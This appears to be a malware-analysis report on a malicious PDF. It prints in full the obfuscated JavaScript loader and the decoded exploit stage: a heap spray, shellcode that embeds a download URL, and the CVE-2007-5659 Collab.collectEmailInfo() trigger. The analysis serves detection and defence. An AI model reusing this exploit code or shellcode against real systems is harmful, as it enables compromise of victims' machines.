Malware Insights
The PDF carries an embedded JavaScript stream (PDF_JAVASCRIPT / PDF_JS), extracted as 'javascript_obj0013_001.js'. That first stage is a name-mangled loader: it assembles its helper functions from concatenated string fragments inside eval(), decodes a carrier string with a custom 6-bit lookup-table / XOR-0x69 decoder, and eval()s the result. Static stage recovery (PDF_GENERIC_STAGE_RECOVERY) decoded that second stage into 'generic_stage_recovery_000.js', so the payload is not opaque: it gates on app.viewerVersion (only Reader 8.0.x, 8.1.0, 8.1.1, 7.0.x and pre-7 builds proceed; 8.1.2+ and 7.1.x are skipped), heap-sprays 4 MiB blocks of NOP sled plus shellcode up to address 0x0c0c0c0c, and then calls Collab.collectEmailInfo() with a 65,536-character msg argument of 0x0c0c — the CVE-2007-5659 trigger. The shellcode embeds the URL http://google-moogle.net/fiesta/load.php?id=42&spl=4 as little-endian %uXXXX escapes; its body is XOR-encoded behind a short decoder stub, so the exact download-and-execute API calls were not confirmed statically, but the layout is consistent with a commodity second-stage downloader. Verdict: malicious, high confidence — the remaining uncertainty is only the behaviour of the second-stage binary, which was not retrieved.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics 8
-
Collab.collectEmailInfo — CVE-2007-5659 · critical · CVE exact · CVE_2007_5659 — PDF JavaScript calls Collab.collectEmailInfo(). CVE-2007-5659 is a buffer overflow in Adobe Reader/Acrobat triggered by an oversized argument passed to Collab.collectEmailInfo() — here a 65,536-character string of 0x0c0c supplied as the msg field after a heap spray to 0x0c0c0c0c. Part of a series of Acrobat JavaScript API exploits. The recovered stage only issues the call on viewer versions below 8.1.2 (plus 7.0.x and pre-7), consistent with the exploit's known fixed build. (Identified after JavaScript deobfuscation.)
-
JavaScript action · low · 3 related findings · PDF_JAVASCRIPT — PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
PDF JavaScript exploit cluster · critical · PDF_JS_EXPLOIT_CLUSTER — PDF combines an executable JavaScript/action surface with exploit-staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior. Matched line in script (truncated preview):
function UObrao14q(){eval("function im"+"plo"+"de(gl"+"ue,pie"+"ces){return ((pieces instanceof Array)?pie"+"ce"+"s.jo"+"in(glu"+"e):pie"+"ces);}");eval("function hA2eM(crgHSxoDdZNeiy){return St"+"rin"+"g['fro"+"mCh"+"arC"+"ode']"+"(crgHSxoDdZNeiy)"+";"+"}");eval("function uwK3csJ3Gy(AkBuvo8kxTy){var Ds8w02sKzKp="+"0,J2mM1XFO3=AkBuvo8kxTy.l"+"en"+"gth,V6nbPpsNiU8u=10"+"2"+"4,AiWmg,vhRmUom34B5E,x3XZsP='',hu4VJ7Eqtvq=Ds8w02sKzKp,RIR87D00PEO=Ds8w02sKzKp,JRrxKGuw=Ds8w02sKzKp,fSU5hLxcCcFU4N=Ar"+"ra"+ … -
PDF exploit shellcode contains an embedded download URL · high · PDF_JS_SHELLCODE_DOWNLOAD_URL — Decoded PDF exploit shellcode contains a hardcoded http(s) URL, stored as little-endian %uXXXX Unicode escapes or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute routine (commodity downloader behaviour rather than a specific Acrobat CVE). In this sample the URL is the cleartext tail of the %u-escaped shellcode in generic_stage_recovery_000.js; the shellcode body itself is XOR-encoded behind a short decoder stub, so the download API was not confirmed statically.
-
Embedded JS stream · low · PDF_JS — PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Generic recovered JavaScript exploit stage · high · PDF_GENERIC_STAGE_RECOVERY — Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers. Here the transform was the custom 6-bit XOR-table decoder and the recovered stage is generic_stage_recovery_000.js.
-
Suspicious extracted artifact · medium · EXTRACTED_FILE_STATIC_TRIAGE — One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL · info · EMBEDDED_URL — One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://google-moogle.net/fiesta/load.php?id=42&spl=4 — referenced by PDF JavaScript (little-endian %u-escaped bytes at the end of the recovered shellcode). Treat it as a second-stage download indicator for blocking and retrospective log searches.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0013_001.js |
pdf-javascript-stream | PDF /JS object 13 at offset 0x367 | 6378 bytes |
SHA-256: 50187a219454e811b602dc518fb1288e1ad531e3f6648744fea2e4f56073f381 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 4 eval/decoder/string-building token(s). 138 of 229 identifiers look randomly generated (e.g. 'FC8FTg77dvxaC98dfdrFVK8BCh32VK8BCh3642gT'); 2 string-concatenation chain(s) — consistent with name-mangling obfuscation.
|
|||
Preview script — first 1,000 lines of the extracted script
// Stage-1 loader (obfuscated, name-mangled). The code below is the carved
// script byte-for-byte; only this comment block was added.
//
// Structure, as visible in the code:
//   * Three eval() calls each assemble a function definition from concatenated
//     string fragments instead of declaring it directly (signature evasion):
//       implode(glue, pieces) -> pieces.join(glue) if pieces is an Array, else pieces
//       hA2eM(n)              -> String['fromCharCode'](n)
//       uwK3csJ3Gy(s)         -> custom decoder, see next point
//   * uwK3csJ3Gy maps each input character through a fixed lookup table
//     (indexed by charCodeAt - 48), packs the resulting 6-bit values into an
//     accumulator (4 input chars -> 3 output bytes) and emits each byte as
//     fromCharCode(105 ^ (acc & 255)), i.e. a base64-like 6-bit alphabet
//     followed by a single-byte XOR with 0x69. Input is walked in
//     1024-character chunks. This is the "sixbit-xor-table" transform named
//     in the stage-recovery artifact entry.
//   * HWkgk01 is the encoded carrier: hundreds of short fragments joined with
//     implode('', [...]) so that no contiguous signature-able string exists.
//   * The final statement, eval(uwK3csJ3Gy(HWkgk01)), executes the decoded
//     stage (recovered separately as generic_stage_recovery_000.js).
// NOTE(review): no call to UObrao14q() appears in this preview; the trigger
// (an /OpenAction, or a call later in the object) is outside what is shown —
// confirm against the full /JS stream before relying on it.
function UObrao14q(){eval("function im"+"plo"+"de(gl"+"ue,pie"+"ces){return ((pieces instanceof Array)?pie"+"ce"+"s.jo"+"in(glu"+"e):pie"+"ces);}");eval("function hA2eM(crgHSxoDdZNeiy){return St"+"rin"+"g['fro"+"mCh"+"arC"+"ode']"+"(crgHSxoDdZNeiy)"+";"+"}");eval("function uwK3csJ3Gy(AkBuvo8kxTy){var Ds8w02sKzKp="+"0,J2mM1XFO3=AkBuvo8kxTy.l"+"en"+"gth,V6nbPpsNiU8u=10"+"2"+"4,AiWmg,vhRmUom34B5E,x3XZsP='',hu4VJ7Eqtvq=Ds8w02sKzKp,RIR87D00PEO=Ds8w02sKzKp,JRrxKGuw=Ds8w02sKzKp,fSU5hLxcCcFU4N=Ar"+"ra"+"y(63,20,0,41,18,57,48,49,36,8,0,0,0,0,0,0,62,54,37,2,6,5,4,52,7,32,47,28,16,31,50,42,23,13,34,53,21,56,19,24,35,14,15,0,0,0,0,11,0,33,30,51,1,44,3,9,25,55,27,38,43,58,10,29,26,59,45,61,46,39,12,22,40,60,17);f"+"o"+"r(vhRmUom34B5E=M"+"at"+"h.c"+"ei"+"l(J2mM1XFO3/"+"V6nbPpsNiU8u)"+";vhRmUom34B5E>Ds8w02sKzKp;vhRmUom34B5E-"+"-){fo"+"r(AiWmg=Ma"+"th.m"+"in(J2mM1XFO3,V6nbPpsNiU8u);AiWmg>Ds8w02sKzKp;AiWmg-"+"-,J2mM1XFO3-"+"-){JRrxKGuw|"+"=(fSU5hLxcCcFU4N[AkBuvo8kxTy.cha"+"rCod"+"eAt(hu4VJ7Eqtvq+"+"+)-48])<"+"<RIR87D00PEO;if(RIR87D00PEO){x3XZsP+"+"=hA2eM"+"(105^JRrxKGuw&"+"2"+"5"+"5);JRrxKGuw>"+">="+"8;RIR87D00PEO-"+"="+"2;}el"+"se{RIR87D00PEO="+"6"+";}}"+"}return (x3XZsP);}var 
HWkgk01=implode('',['gsdC','j','8GF','HIB_6','xLY','IFa','w212ChBFT','go2fb8F','njedCLFFL','4B','GfK','KICo2IdH','8Ffkv2Z','kv','CFH','y','dDkv2','DmF8nuKN_Q','U7DEBFfDyTF9UL12B8Fg5','z2','21','2f','gE','8','nuKN_QU7DHT2','fH','ULH','d','vGwT7','IdMEd','CYFEL','4xNgu','y4fbez4','CzT4OKNgJGIH','j9EEg','3Nguy','4fbez41B8nuKN_QU7DH3dH_x','zH','j','26dY','F1wE7IdME','dCYF','Bzjd','81grd','f','o67DH88nuK','N_QU7D4BFE','gs2HHxLH2W6dgB','cZRF','EHQyT2cUaPdd1448GH9ez4L2VHpsz9avV_h','36Yg','zT4hEzwn8BCh','3Lwn','9T4MI','6Dgg4Yc','WRZxI','Swy','FBHzBFT','g77d','vxaC98','d','fd','r','F','VKGBwo3E','VKGBwo3EVKG','B','wo3EVK8S_eeCVKxBwKrCVKyS','P','O2E','VKFTwl2EVKFTwha','EVK6','N_p3EVK6','Nwo3','EVK6N','nJICVK64','1h7EVK','yN','_','exCV','KyN_','JyCVKFSnbsCVKGN_o7','CVK6N_eyCVKyTPey','CVK6RwxyCVK2S_M','SE','VKGSw','Jx','EV','K2S_','M','SEVKy','E_eUEVK6N_h3EVK6N_','eeCVKyTPeyCVKeC1h3EVKyE','wz5EV','K6CwxIEVK','8BPh3EVK6N_WaEVK6N_','eyCVKICnMs','EVK','eC1eeCVKU','BPz5EVKyEPW','aEVK8BPeIEVK6N_WsCVK','6','N_','ey','CVKICnMsE','VK','eC1eUE','VKxCnz5EVKITwKsCVK8BPjS','CV','K6N_','h','S','CVK6N_ey','CVKICnMsEVKeC1exE','VK','8','Twz5EV','K8S_jaE','VK8BP','zsC','VK','6','N_prC','VK','6','N','_eyCV','KICnMsEV','KeC1JyCV','KeE_z5EVK8','E','n','Ls','EVK8BPK','5','EVK6N','_j','dEV','K','6N_eyCV','KICnMs','E','VKIN_','JeCVK','GRPMsCVK2','Enj3CVKy','SPW7EVKyRPxICVK641h','sEVK6','N','_e','6CVKeCweyCV','K2','EnMsEV','Ky','TPOeCV','K6NnxICVK6C_z7E','VKy','TP','lyEVKyRPlIC','VK8BPl2EV','K6N','_MSEVK6','N_eyCVKFBPlyCVKyCPr2E','VK2S_','O8EVKUT1h5','E','VK6N_eyCVK','ySP','e','yCVKy','R','wxICV','Ke','EnMSEV','KeS_M3CVKySPly','CVKxN','_xICVKIT','w','z5EV','K6N_eyCVKeN_eyC','VKIC','nMSEVKFEPJeC','V','KeNPe','GCVKeCnMSEVK8','BPJU','EVK','6N_z7','CVK6N_eyCV','K','ICnexCVK','eT1Oy','CVKeRweyCVKxCwLaEV','KeT1zaC','VK6Nnxy','CVKFEnL5','EV','K6','N_eyC','VK2EnWBEVKyTP','O','yC','VK6Rw','xICVK6C_z7E','VKyTP','lyEVKy','RPl','I','CV','KI','N_h5','EVK6','N_','e','yCVK','FEPeyCV','KeR','P','eFEVKICnexC','VKGRnOe
CVKeRnpSE','VKITwlxCV','KxN_LaCVKeRnlyCV','KIC','nMSEVKFEPJxEVKeNPeICVKeCnMSEVK8BPJU','EVK6N','_OxCVK6','N_ey','C','VK','6N_','z7EV','K2EnWBEVKyTPO','yC','VK','6RPx','ICVK64_z7EVKyTP','l','yEVKyRPlICVKyN_h5','E','VK','6N','_ey','CVKFE','P','e','y','CVKyTPW','BE','VKyN_x','ICVK6C_z7EVKyTPlyEVKyR','PlICVK6N_h5EVK','6N_e','yCVKIC_eyCVKe4_lG','EVK8E_e','xCVK8E_ex','CVK8E_','exC','VK8E_e','xCVK8','Bw','M3','CVKeCPeeCVKy','TPlxCV','K8T_','p7EVKe4_WEEVK8S_WB','EVKyTPlICVK','yTPh3EVK6RPLrEVKeNwMSEVKeC1exEVK2BnM','SEV','K','yTP','rxEV','KyCwLrCV','K','6R','nL5EV','KeC1W3CVK2','E1','MSEVK6RnOyCV','KGR','nW3CVKIN','PjsEVKGS','wx6CVK','e','B','n','exCVK','GRnl2EVK6','4w','W','dE','VK','yN_','K','aEVKI','T_r6EVK','6RPLrCVKeEwj7','CVK6RneeEVKIN_WSCVK','IE_','hSEVK','I','EwrGEV','K2EnlIEVK','e','CPhaCV','K','8TPMSEVKeCP','MS','EVK6RnOeCVKFE1prEVK6RwMS','EVKyTPx','GEVKyRw','l6EVKxSwexCVK','6Nn','M','SEVK6RnMSEVK','eC','wjaC','VK','e','T_l','eEVK6N_eUEVKIS','nh5EVKITwWaEV','KeC','nWBEVKIRwlG','C','VKI4wxeEVK6N','_xI','E','VKUTPMEEVKUTwb','SEVKe','S_paCVKy','BP','jsCVKyS_MsCVKyBn','M5E','VKeT_M7EVKyS_MS','CVKyBPMsCVKy','EPM3CV','Ky','E','_j','7CVKUTPM','7EVKySPjsCVKyEPMdEVKUTPb','3EVKeS_MaEVKyS','_M3CVKyTPMa','EVK','UTwj7','CVKUTw','ME','EVKyE1p','sCVKx','T_','MSE','VKxS','wpSEV','KUBwjsEVKy','BnbB','EVKx','T','PpSN42gT4MI6','Dga6g5W4DkUS_z','6VdzBFTgBTFoBTwhBTw','4BGH9ez40eI','CfvLD','u','efF','zrcHgzT4R8','cvkUfnWrEZz5z1HT2fH','U','LH','d8G','Lg','rB','1gs','dC','j','8FfDyTF9','UL','1gzT','49K4Yk8ag','bs4F','y1L1','gz14dsc','C','n','v62hKN','YL','FSYM91','w','zx','T1','2gT4M','I6D','g3Ngu','y4fbez41BFHH6IDnIL','Dv','FG4v7d1hd','Twv7d1','hdTw_d81g3Ng','uy4','fbez41B','Ffkv2Z','kvCFHydDk','v2D','mF','8n','u','KN','_QU7DEBFfD','y','TF','9UL','12gT4','MI6DgadHQyfn','5Gd','Cgz','T','4ddd','v','oxS','Ha','F','Nvr8BCq8Fzg','BTFoBT','whBTw2hFC','u8XghWRPJ','FdZEF','B1gsIdj81LMI','6Dgo4','2hQ2wb24HLG','Cn','1BB1uFLw','fIB','HIGdF','rI4','TW6zf0I','4Y','oII1uFL','wfIBH','IGdFrIRLCd1448','G',
'FHIB','_6xLYIFaw212Chgcgd','8S2W5d9','o2z','_xLV4','1','B8nuKN_QU7Dgg14R','8','cvkUfnWrEZz5z1','4BFEgz','z4Z67dnG','d2DKL','4','k27HLUdY','C6SH7y','2vdd144','8','GH9ez4d','K','CfWL4','dI2Nn','gzT4','98zDHsd2vU','df','jyf','fjxd','2DK6z','oWIYoe','d','2HU','L','L2gT','4dKCfWL4dI2Nng','z','T4dKCfWL4dI','2NnHrd','fh','12C','n6L','LDTV','_D','5','Lz','_rFL4B','G','H9ez4','z','WLw86RwgzT','4H6I','H','gaNDj','I','2','FdE6gvIdgE2C9lK8CdI','6DxGzLhd1','z','dKCfWL4','d','I2NnH3L29ed','noFFw2T12u62','D81','29IeNznF2CjI','4Hdr','EL2','gT42y','L4dE1F','D8','EgexBvh','zV4','1zT','4zBGVZB1L','dEadh','zC_p','gfwG8F','T1BF','wgsGVg','Eadh','zC','_p','gcwG','81TgrELg','TzEgEadhzC_p','gfwG81TgaE','L','2B','1ET81LzWLw86RwN8EQ','gzETg5T4Zs14z','WLw86RwNIEQgTT4Wd','14T','1z4dEadhzC_p','gVw','G81Tg','5E','L2B','8FgBcZRFEHQyT2cUaPd','d','81gsdC','j','81HF','yd','FC8FTg77dvxaC98dfdrFVK8BCh32VK8BCh3642gT4bF22E6','LLoL6HL96zE','66dYGz2gTT4oS','E','1KrELg','SddM2a2ggFTgSddM2a24B1Hd','2','IDH','3','IdE','12','C_x','VHDed','fgzT4OWLdEI6','C','H3','IdE12','fnGd_FI22E2NdZW','L','L','4','xdH','_','v61g','rG4Ez','IDYvT4oL6','HL92','E2gT41','8FEgh','CFM2aHU9','2PM','Fcf6','FFL4d']);");eval(uwK3csJ3Gy(HWkgk01));}  // decoded stage is eval()ed here; no caller of UObrao14q() is visible in this preview
|
|||
generic_stage_recovery_000.js |
deobfuscated-js | generic stage recovery sixbit-xor-table from JavaScript object 13 at offset 0x367 | 2572 bytes |
SHA-256: 833b5fbd48cfdc0b42f6660e33621be552d13e9147a32aec57af13eebd346194 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 3 eval/decoder/string-building token(s).
|
|||
Preview script — first 1,000 lines of the extracted script
// Stage 2, recovered from the 6-bit/XOR carrier in object 13. This is the
// actual exploit: a heap spray followed by the CVE-2007-5659
// Collab.collectEmailInfo() trigger. Code is token-for-token the carved
// script; only whitespace and comments were added.

// Global array that keeps every spray block referenced so the garbage
// collector cannot free the sprayed heap before the overflow fires.
var zn1GYcPIx3ila0 = new Array();

// Pad helper: doubles CNNFdwr until it holds at least eo6xag8 bytes (JS
// strings are 2 bytes per char, hence length*2), then trims it to exactly
// eo6xag8/2 characters. Used to size the NOP sled so that sled + shellcode
// fills one spray block.
function eOjUOJynvqOjqS(CNNFdwr, eo6xag8) { while (CNNFdwr.length*2<eo6xag8){CNNFdwr += CNNFdwr;} CNNFdwr = CNNFdwr.substring(0,eo6xag8/2); return CNNFdwr; }

// Heap spray: fills memory with 4 MiB blocks of [0x90 NOP sled | shellcode]
// so that the address 0x0c0c0c0c lands inside a sled.
function PVK8ud6hZw7() {
  var yYt3vHHZD0cR = 0x0c0c0c0c;   // target address; the same byte pattern is used for the trigger buffer below
  // Shellcode as little-endian %uXXXX words (unescape yields one UTF-16 unit
  // per word). After three 0x4343 pad words the first bytes read as a short
  // self-decoder (jmp / pop ebx; xor ecx,ecx; mov cx,0x180; xor byte [ebx],0xEF;
  // inc ebx; loop; call back), so the body appears to be XOR-0xEF encoded and
  // its API calls are not readable here. The last 26 words are cleartext and
  // decode to "http://google-moogle.net/fiesta/load.php?id=42&spl=4"
  // (matches the EMBEDDED_URL finding); by my count they begin exactly where
  // the decoder's 0x180-byte range ends, which is why they survive in plaintext.
  var KPZOWA12U8w8 = unescape("%u4343%u4343%u4343%u0FEB%u335B%u66C9%u80B9%u8001%uEF33%uE243%uEBFA%uE805%uFFEC%uFFFF%u8B7F%uDF4E%uEFEF%u64EF%uE3AF%u9F64%u42F3%u9F64%u6EE7%uEF03%uEFEB%u64EF%uB903%u6187%uE1A1%u0703%uEF11%uEFEF%uAA66%uB9EB%u7787%u6511%u07E1%uEF1F%uEFEF%uAA66%uB9E7%uCA87%u105F%u072D%uEF0D%uEFEF%uAA66%uB9E3%u0087%u0F21%u078F%uEF3B%uEFEF%uAA66%uB9FF%u2E87%u0A96%u0757%uEF29%uEFEF%uAA66%uAFFB%uD76F%u9A2C%u6615%uF7AA%uE806%uEFEE%uB1EF%u9A66%u64CB%uEBAA%uEE85%u64B6%uF7BA%u07B9%uEF64%uEFEF%u87BF%uF5D9%u9FC0%u7807%uEFEF%u66EF%uF3AA%u2A64%u2F6C%u66BF%uCFAA%u1087%uEFEF%uBFEF%uAA64%u85FB%uB6ED%uBA64%u07F7%uEF8E%uEFEF%uAAEC%u28CF%uB3EF%uC191%u288A%uEBAF%u8A97%uEFEF%u9A10%u64CF%uE3AA%uEE85%u64B6%uF7BA%uAF07%uEFEF%u85EF%uB7E8%uAAEC%uDCCB%uBC34%u10BC%uCF9A%uBCBF%uAA64%u85F3%uB6EA%uBA64%u07F7%uEFCC%uEFEF%uEF85%u9A10%u64CF%uE7AA%uED85%u64B6%uF7BA%uFF07%uEFEF%u85EF%u6410%uFFAA%uEE85%u64B6%uF7BA%uEF07%uEFEF%uAEEF%uBDB4%u0EEC%u0EEC%u0EEC%u0EEC%u036C%uB5EB%u64BC%u0D35%uBD18%u0F10%u64BA%u6403%uE792%uB264%uB9E3%u9C64%u64D3%uF19B%uEC97%uB91C%u9964%uECCF%uDC1C%uA626%u42AE%u2CEC%uDCB9%uE019%uFF51%u1DD5%uE79B%u212E%uECE2%uAF1D%u1E04%u11D4%u9AB1%uB50A%u0464%uB564%uECCB%u8932%uE364%u64A4%uF3B5%u32EC%uEB64%uEC64%uB12A%u2DB2%uEFE7%u1B07%u1011%uBA10%uA3BD%uA0A2%uEFA1%u7468%u7074%u2F3A%u672F%u6F6F%u6C67%u2D65%u6F6D%u676F%u656C%u6E2E%u7465%u662F%u6569%u7473%u2F61%u6F6C%u6461%u702E%u7068%u693F%u3D64%u3234%u7326%u6C70%u343D");
  var aNPOpO7FxUl8 = 0x400000;   // spray block size: 4 MiB
  var VbcjjpNRy8Rv = KPZOWA12U8w8.length * 2;   // shellcode size in bytes
  // Sled size = block size - shellcode - 0x38. The 0x38 slack presumably
  // accounts for the JS string object header so each string spans exactly one
  // block — TODO confirm, not established by the code itself.
  var eo6xag8 = aNPOpO7FxUl8 - (VbcjjpNRy8Rv+0x38);
  var CNNFdwr = unescape("%u9090%u9090");   // NOP sled seed: four 0x90 bytes
  CNNFdwr = eOjUOJynvqOjqS(CNNFdwr, eo6xag8);
  // Block count: (0x0c0c0c0c - 4 MiB) / 4 MiB ~= 47.19, so the loop runs 48
  // times (~192 MiB of spray), enough to cover the target address.
  var qudVAPta = (yYt3vHHZD0cR - 0x400000)/aNPOpO7FxUl8;
  for (var Nh0j1wItyDA=0;Nh0j1wItyDA<qudVAPta;Nh0j1wItyDA++) {
    zn1GYcPIx3ila0[Nh0j1wItyDA] = CNNFdwr + KPZOWA12U8w8;
  }
}

// Version gate followed by the trigger.
function OyvywQk5vXfY() {
  // app.viewerVersion (e.g. "8.1.1") is stripped to digits and its first
  // three digits are treated as major/minor/patch. The condition fires for
  // 8.0.x, 8.1.0, 8.1.1, 7.0.x and any leading digit below 7 — i.e. builds
  // before 8.1.2 — while 7.1.x and 8.1.2+ are skipped; that matches the
  // fixed build for CVE-2007-5659 (not verified here). Note the crude parse
  // and loose == on single characters: a two-digit major such as "10.x" is
  // read as major=1 and would also satisfy the "< 7" branch.
  var hNeqMlIIB = app.viewerVersion.toString();
  hNeqMlIIB = hNeqMlIIB.replace(/\D/g,"");
  var xo0ME3 = new Array(hNeqMlIIB.charAt(0),hNeqMlIIB.charAt(1),hNeqMlIIB.charAt(2));
  if ((xo0ME3[0] == 8 && ((xo0ME3[1] == 1 && xo0ME3[2] < 2) || xo0ME3[1] < 1)) || (xo0ME3[0] == 7 && xo0ME3[1] < 1) || (xo0ME3[0] < 7)) {
    PVK8ud6hZw7();   // spray before triggering
    // Trigger buffer: "\u0c0c\u0c0c" doubled until >= 44952 chars, which
    // stops at 65536 chars (128 KiB of 0x0c bytes) — any pointer read out of
    // this buffer is 0x0c0c0c0c, inside the sprayed sled.
    var tmvyk = unescape("%u0c0c%u0c0c");
    while(tmvyk.length < 44952) tmvyk += tmvyk;
    // CVE-2007-5659: oversized msg argument to Collab.collectEmailInfo().
    this.collabStore = Collab.collectEmailInfo({subj: "",msg: tmvyk});
  }
}
OyvywQk5vXfY();
|
|||